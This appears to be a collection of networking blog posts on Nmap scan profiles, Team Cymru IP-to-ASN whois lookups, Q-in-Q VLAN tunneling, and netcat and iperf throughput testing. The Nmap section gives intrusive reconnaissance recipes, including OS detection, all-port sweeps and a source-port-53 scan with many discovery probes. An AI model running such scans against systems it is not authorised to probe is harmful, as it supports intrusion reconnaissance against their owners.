-sn    Only send a ping to the target; no port scanning. This is useful if you need to determine which hosts are in the vicinity but do not want to scan them yet. Do not mistake this for the TCP Null scan (-sN); Nmap options are case sensitive.

 

That's all folks! Happy scanning!

Category: NETWORKING
September 28

NMAP

[Intense scan]
command = nmap -T4 -A -v
description = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.

[Intense scan plus UDP]
command = nmap -sS -sU -T4 -A -v
description = Does OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute) in addition to scanning TCP and UDP ports.

[Intense scan, all TCP ports]
command = nmap -p 1-65535 -T4 -A -v
description = Scans all TCP ports, then does OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).

[Intense scan, no ping]
command = nmap -T4 -A -v -Pn
description = Does an intense scan without checking to see if targets are up first. This can be useful when a target seems to ignore the usual host discovery probes.

[Ping scan]
command = nmap -sn
description = This scan only finds which targets are up and does not port scan them.

[Quick scan]
command = nmap -T4 -F
description = This scan is faster than a normal scan because it uses the aggressive timing template and scans fewer ports.

[Quick scan plus]
command = nmap -sV -T4 -O -F --version-light
description = A quick scan plus OS and version detection.

[Quick traceroute]
command = nmap -sn --traceroute
description = Traces the paths to targets without doing a full port scan on them.

[Regular scan]
command = nmap
description = A basic port scan with no extra options.

[Slow comprehensive scan]
command = nmap -sS -sU -T4 -A -v -PE -PS80,443 -PA3389 -PP -PU40125 -PY --source-port 53 --script "default or (discovery and safe)"
description = This is a comprehensive, slow scan. Every TCP and UDP port is scanned. OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute) are all enabled. Many probes are sent for host discovery. This is a highly intrusive scan.
Category: NETWORKING, SECURITY
September 25

IP TO ASN MAPPING

For example, to enable verbose mode (all flags) when querying the Team Cymru whois server, one would use:

$ whois -h whois.cymru.com " -v 216.90.108.31 2005-12-25 13:23:01 GMT"

AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | Info                    | AS Name
23028   | 216.90.108.31    | 216.90.108.0/24     | US | arin     | 1998-09-25 | 2005-12-25 13:23:01 GMT | TEAMCYMRU - SAUNET

You may also query for some basic AS information directly:

$ whois -h whois.cymru.com " -v AS23028"

AS      | CC | Registry | Allocated  | AS Name
23028   | US | arin     | 2002-01-04 | TEAMCYMRU - SAUNET

We recommend using GNU's version of netcat rather than nc (nc has been known to cause buffering problems with the whois.cymru.com server and will not always return the full output for larger IP lists). GNU netcat can be downloaded from http://netcat.sourceforge.net; it is the same as gnetcat in the FreeBSD ports.
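
The netcat recommendation mainly matters for bulk lookups. A hedged example of the bulk interface, using the begin/verbose/end keywords documented by Team Cymru and an illustrative IP list file:

$ cat iplist.txt
begin
verbose
216.90.108.31
8.8.8.8
end
$ netcat whois.cymru.com 43 < iplist.txt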

Links:

https://asn.cymru.com/

https://www.ultratools.com/tools/asnInfoResult?domainName=8.8.8.8

 

Category: NETWORKING, TOOLS
September 24

QinQ

Carrying a trunk across a single VLAN

Q-in-Q, or dot1q tunneling, is a technology aimed mainly at service providers and, as with almost all carrier technologies, it lets you squeeze much more out of the technology.

What does Q-in-Q consist of?

Q-in-Q consists of building a tunnel which, using a single VLAN as transport (a VLAN that lives in the provider's network), carries all the VLANs of a customer's 802.1Q trunk. It is simply a Layer 2 VPN service for the customer that uses a Layer 2 network on the provider side as transport.

How does it work?

Trying not to turn this into an unreadable article, what it does is add a second level of VLAN tagging: on top of the 802.1Q tag the customer uses, we add our own 802.1Q tag. This way, while packets cross the provider's network the only tag that is looked at is the provider's 802.1Q tag, and when they reach the other end of the tunnel that tag is removed and a perfectly normal trunk is delivered.

The 802.1QinQ frame format is:

Dest MAC | Source MAC | dot1Q (provider) | dot1Q (customer) | IP
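
On Cisco Catalyst switches that support dot1q tunneling, the provider-edge port facing the customer can be configured roughly as below. This is only a hedged sketch (commands vary by platform and IOS version); VLAN 100 stands in for the provider transport VLAN, and the optional l2protocol-tunnel line carries the customer's STP BPDUs across the provider network, which is relevant to the Spanning Tree discussion below:

interface GigabitEthernet0/1
 description Customer-facing tunnel port
 switchport access vlan 100
 switchport mode dot1q-tunnel
 l2protocol-tunnel stp
!
interface GigabitEthernet0/24
 description Towards the provider core
 switchport mode trunk
 switchport trunk allowed vlan 100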


 

Spanning Tree implications?

The customer's LANs interact with each other as if their switches were directly connected; for practical purposes it behaves like one LAN. So the customer runs its own STP and the provider runs its own, and of course any STP change on the provider side affects the customer in the form of an outage.

Category: NETWORKING, QinQ
January 23

How to test network connection performance between two Linux servers

Information

In some cases, it is necessary to check network connection performance between two Linux-based hosts, for example, to validate traffic shaping settings.

The simplest way to do this is to use netcat.

On server machine:

~# nc -l 1122 > /dev/null

On client machine:

~# dd if=/dev/zero bs=9100004096 count=1 | nc <SERVER_MACHINE_IP> 1122

As a result, a similar message will be displayed:

2147479552 bytes (2.1 GB) copied, 46.8923 s, 45.8 MB/s

NOTE: It is necessary to set count=1 because netcat will quit after the first chunk has been transferred.

Listen and redirect to /dev/null on one machine:

nc -l -p 7000 > /dev/null

Connect and pipe 100 MiB of random data from the other machine:

dd if=/dev/urandom bs=1M count=100 | nc 192.168.1.120 7000 -q 10

For real-time stats, use pipe viewer (pv):

dd if=/dev/urandom bs=1M count=100 | pv | nc 192.168.1.120 7000 -q 10
Category: NETWORKING, PERF
January 23

Testing network performance

Testing network performance in terms of speed and bandwidth is the norm in both production and non-production environments.

A detailed speed and bandwidth analysis is very useful when deploying network-dependent application servers, and sometimes you also need to double-check your network throughput while troubleshooting. All of this requires a reliable network performance testing tool. This post concentrates on one such tool, called "iperf".

iperf is an open source tool that can be used to test network performance, and its test results are much more reliable than those of many online network speed test providers.

An added advantage of iperf is that it works very well when you have two servers in geographically different locations and want to measure the network performance between them.

 

How to install iperf?

Installing iperf is very easy if you have the EPEL yum repository enabled (on Red Hat based systems).

[root@slashroot1 ~]# yum install iperf
================================================================================
 Package          Arch            Version                 Repository       Size
================================================================================
Installing:
 iperf            i386            2.0.5-1.el5             epel             52 k

Installing iperf from source is also very easy. Just download the iperf source package from the Iperf Source Package link.

Then follow the normal source installation steps, as shown below.

#tar -xvf iperf-2.0.5.tar.gz

The above command extracts the tar package you downloaded from the link above.

Now change into the extracted directory and run the command below to configure it with the default options.

[root@slashroot2 ~]# cd iperf-2.0.5
[root@slashroot2 iperf-2.0.5]# ./configure

 

Now let's compile it with the "make" command and then install it using "make install".

[root@slashroot2 iperf-2.0.5]# make
[root@slashroot2 iperf-2.0.5]# make install

How to install iperf on a Windows machine?

Installing iperf on Windows is also quite easy. Let's see how.

You can download iperf for Windows from the Iperf for Windows link. Unzip the file into a folder named "iperf" and run the iperf.exe inside that directory.

For example, I extracted the iperf zip into the C:\iperf directory, so I open the Windows CMD, navigate to that directory and run the iperf.exe command.

C:\>cd C:\iperf
C:\iperf>iperf.exe

How to test the network speed between a Windows machine and a Linux machine?

As I mentioned before, iperf can be used to perform a speed test between remote machines. It works in a client-server model.

Note: The operating system does not matter when using iperf; the commands are exactly the same on Windows, Linux and other operating systems. Normally, in the test environment, the iperf client sends data to the server for the test.

Before going ahead with the test, let's understand some networking concepts related to speed testing.

Network Throughput

The rate at which data is transferred from one place to another with respect to time is called throughput. Throughput is used as a quality metric for hard disks, networks, etc. It is measured in Kbps (kilobits per second), Mbps (megabits per second) or Gbps (gigabits per second).

TCP Window

TCP (Transmission Control Protocol) is a reliable transport layer protocol used for network communications. How TCP works is beyond the scope of this article; in short, it achieves reliability by sending messages and waiting for acknowledgements from the receiver.

Whenever two machines communicate with each other, each of them informs the other about the number of bytes it is ready to receive at one time.

In other words, the maximum amount of data that a sender can send to the other end without receiving an acknowledgement is called the window size. The TCP window size can sometimes hurt network throughput badly. Let's take an example.

Suppose you want to send 500 MB of data from one machine to the other, with a TCP window size of 64 KB.

That means that to send the whole 500 MB, the sending machine has to stop and wait for an acknowledgement from the receiver roughly 8,000 times:

500 MB / 64 KB = 8000

So you can clearly see that increasing the window size a little to tune TCP can make a significant difference to the throughput achieved.

Suppose you have a Windows machine and want to measure the speed between it and another Linux machine; you need to make one of them the client and the other the server. Let's see how.

We will make our Windows machine the server and the Linux machine the client.

C:\iperf>iperf.exe -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 64.0 KByte (default)
------------------------------------------------------------

The -s argument tells iperf to run as a server.

The above command starts the iperf server on the Windows machine; by default it listens on port 5001. (It also reports that the default TCP window size is 64.0 KB.)

Let's test the throughput from the Linux client machine, as shown below.

[root@slashroot2 ~]# iperf -c 192.168.0.101
------------------------------------------------------------
Client connecting to 192.168.0.101, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.0.102 port 47326 connected with 192.168.0.101 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-10.0 sec   308 MBytes   258 Mbits/sec

From the above output you can see that I got a speed of 258 Mbits/sec. The output also shows a few other things:

Interval:  Interval specifies the time duration for which the data is transferred.

Transfer: all data transferred by iperf goes through memory and is flushed when the test completes, so there is no transferred file to clean up afterwards. This column shows the amount of data transferred.

Bandwidth: This shows the rate of speed with which the data is transferred.

 

You can start the iperf server on a port of your choice as follows.

C:\iperf>iperf.exe -s -p 2000
------------------------------------------------------------
Server listening on TCP port 2000
TCP window size: 64.0 KByte (default)
------------------------------------------------------------

You can also tell the client to connect to your chosen server port, and tweak a few more connection and reporting parameters, as shown below.

root@slashroot2 ~]# iperf -c 192.168.0.101 -t 20 -p 2000 -w 40k
------------------------------------------------------------
Client connecting to 192.168.0.101, TCP port 2000
TCP window size: 80.0 KByte (WARNING: requested 40.0 KByte)
------------------------------------------------------------
[  3] local 192.168.0.102 port 60961 connected with 192.168.0.101 port 2000
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-20.0 sec  1.74 GBytes   747 Mbits/sec

The -t option used in the above command tells iperf to transfer data for 20 seconds.

The -p option tells the client to connect to port 2000 on the server.

The -w option specifies your desired window size. As mentioned before, window size tuning can improve the TCP transfer rate to a certain extent.

And you can clearly see from the above output that the bandwidth of the whole transfer increased as we increased the window size. (I am using two virtual machines on one physical box for this iperf demonstration, which is why I am getting exceptional transfer rates.)

You can also tell the iperf client to report the transfer rate at 1-second intervals over the whole 10-second transfer, as shown below with the -i option.

[root@slashroot2 ~]# iperf -c 192.168.0.100 -P 1 -i 1
------------------------------------------------------------
Client connecting to 192.168.0.100, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.0.102 port 49597 connected with 192.168.0.100 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0- 1.0 sec  28.6 MBytes   240 Mbits/sec
[  3]  1.0- 2.0 sec  25.9 MBytes   217 Mbits/sec
[  3]  2.0- 3.0 sec  26.5 MBytes   222 Mbits/sec
[  3]  3.0- 4.0 sec  26.6 MBytes   223 Mbits/sec
[  3]  4.0- 5.0 sec  26.0 MBytes   218 Mbits/sec
[  3]  5.0- 6.0 sec  26.2 MBytes   220 Mbits/sec
[  3]  6.0- 7.0 sec  26.8 MBytes   224 Mbits/sec
[  3]  7.0- 8.0 sec  26.0 MBytes   218 Mbits/sec
[  3]  8.0- 9.0 sec  25.8 MBytes   216 Mbits/sec
[  3]  9.0-10.0 sec  26.4 MBytes   221 Mbits/sec
[  3]  0.0-10.0 sec   265 MBytes   222 Mbits/sec

Until now we have only seen the throughput of one TCP connection, because when you run iperf it by default creates only one TCP connection to the remote server.

 

Note: You might have noticed that some internet download managers are much faster at downloading content than the normal operating system downloader. The main reason is that they use parallel TCP connections. One such download manager that I remember is "Internet Download Manager".

Let's check the throughput report when we increase the number of parallel connections with iperf.

[root@slashroot2 ~]# iperf -c 192.168.0.100 -P 20
------------------------------------------------------------
Client connecting to 192.168.0.100, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[ 15] local 192.168.0.102 port 57258 connected with 192.168.0.100 port 5001
[  3] local 192.168.0.102 port 57246 connected with 192.168.0.100 port 5001
[  4] local 192.168.0.102 port 57247 connected with 192.168.0.100 port 5001
[  5] local 192.168.0.102 port 57248 connected with 192.168.0.100 port 5001
[  7] local 192.168.0.102 port 57250 connected with 192.168.0.100 port 5001
[  6] local 192.168.0.102 port 57249 connected with 192.168.0.100 port 5001
[ 10] local 192.168.0.102 port 57253 connected with 192.168.0.100 port 5001
[  8] local 192.168.0.102 port 57251 connected with 192.168.0.100 port 5001
[  9] local 192.168.0.102 port 57252 connected with 192.168.0.100 port 5001
[ 16] local 192.168.0.102 port 57259 connected with 192.168.0.100 port 5001
[ 19] local 192.168.0.102 port 57261 connected with 192.168.0.100 port 5001
[ 18] local 192.168.0.102 port 57260 connected with 192.168.0.100 port 5001
[ 20] local 192.168.0.102 port 57262 connected with 192.168.0.100 port 5001
[ 17] local 192.168.0.102 port 57263 connected with 192.168.0.100 port 5001
[ 21] local 192.168.0.102 port 57264 connected with 192.168.0.100 port 5001
[ 11] local 192.168.0.102 port 57254 connected with 192.168.0.100 port 5001
[ 12] local 192.168.0.102 port 57255 connected with 192.168.0.100 port 5001
[ 13] local 192.168.0.102 port 57256 connected with 192.168.0.100 port 5001
[ 14] local 192.168.0.102 port 57257 connected with 192.168.0.100 port 5001
[ 22] local 192.168.0.102 port 57265 connected with 192.168.0.100 port 5001
[ ID] Interval       Transfer     Bandwidth
[  8]  0.0-10.6 sec  16.6 MBytes  13.1 Mbits/sec
[ 16]  0.0-10.6 sec  16.6 MBytes  13.1 Mbits/sec
[ 18]  0.0-10.6 sec  16.5 MBytes  13.1 Mbits/sec
[ 17]  0.0-10.7 sec  16.6 MBytes  13.0 Mbits/sec
[ 21]  0.0-10.7 sec  15.6 MBytes  12.3 Mbits/sec
[ 12]  0.0-10.7 sec  17.5 MBytes  13.7 Mbits/sec
[ 22]  0.0-10.7 sec  16.6 MBytes  13.0 Mbits/sec
[ 15]  0.0-10.8 sec  17.8 MBytes  13.8 Mbits/sec
[  3]  0.0-10.7 sec  18.5 MBytes  14.5 Mbits/sec
[  4]  0.0-10.8 sec  18.1 MBytes  14.1 Mbits/sec
[  5]  0.0-10.7 sec  17.6 MBytes  13.9 Mbits/sec
[  7]  0.0-10.8 sec  18.4 MBytes  14.3 Mbits/sec
[  6]  0.0-10.8 sec  17.0 MBytes  13.2 Mbits/sec
[ 10]  0.0-10.8 sec  16.8 MBytes  13.1 Mbits/sec
[  9]  0.0-10.8 sec  16.8 MBytes  13.0 Mbits/sec
[ 19]  0.0-10.6 sec  16.5 MBytes  13.0 Mbits/sec
[ 20]  0.0-10.7 sec  16.5 MBytes  12.9 Mbits/sec
[ 11]  0.0-10.7 sec  18.0 MBytes  14.0 Mbits/sec
[ 13]  0.0-10.7 sec  17.8 MBytes  13.9 Mbits/sec
[ 14]  0.0-10.8 sec  18.2 MBytes  14.1 Mbits/sec
[SUM]  0.0-10.8 sec   344 MBytes   266 Mbits/sec

In the example above I told the iperf client to create 20 parallel TCP connections to the remote host for the data transfer. If you observe the output, you can clearly see that 20 different ports on the client are connected to the default port 5001 on the server.

Each of the connections had a different transfer rate, and at the end we got a combined throughput of 266 Mbits/s (which is much better than a single TCP connection).

 

Conducting a UDP speed test in iperf

Conducting a UDP speed test with iperf provides some additional information about your network that is very useful for finding network bottlenecks.

As we discussed before, not only the TCP window size but also network characteristics like the following affect the throughput achieved over a connection:

  • Out of order delivery
  • Network Jitter
  • Packet loss out of total number of packets

To conduct an iperf UDP test, you need to start the server with the -u option so that UDP port 5001 is opened on the server side.

C:\iperf>iperf.exe -s -u
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size: 64.0 KByte (default)
------------------------------------------------------------

Now let's start the data transfer from the client side by sending UDP traffic.

[root@slashroot2 ~]# iperf -c 192.168.0.100 -u -b 100m
------------------------------------------------------------
Client connecting to 192.168.0.100, UDP port 5001
Sending 1470 byte datagrams
UDP buffer size:  107 KByte (default)
------------------------------------------------------------
[  3] local 192.168.0.102 port 50836 connected with 192.168.0.100 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-10.0 sec  97.4 MBytes  81.7 Mbits/sec
[  3] Sent 69508 datagrams
[  3] Server Report:
[  3]  0.0-10.0 sec  97.4 MBytes  81.8 Mbits/sec   0.167 ms   49/69507 (0.07%)
[  3]  0.0-10.0 sec  1 datagrams received out-of-order
[root@slashroot2 ~]#

 

In the above example I used the -b option to specify the bandwidth to use (by default the iperf UDP test uses only 1 Mbps; I recommend using your full available bandwidth to get a realistic picture).

The -u option also needs to be used on the client side to send UDP traffic.

The output tells us the following:

Bandwidth = 81.7Mbits/sec

Network jitter = 0.167 ms (network jitter is the deviation in the periodic arrival time of datagrams. If you run the test against a server on the other side of the globe, you might see higher jitter values in the iperf output.)

Out of Order = 1 datagram

Lost/Total =  49/69508

A 0.07 percent datagram loss is not significant at all; in fact, you could say this is a very good packet loss ratio.

VoIP requires very low datagram loss because it is voice communication; a high datagram loss can drop the call altogether. So UDP testing with iperf is very helpful if you have VoIP or other such critical applications in your infrastructure.

You can get all the options related to iperf with the following command:

[root@slashroot2 ~]# iperf --help
Category: NETWORKING, PERF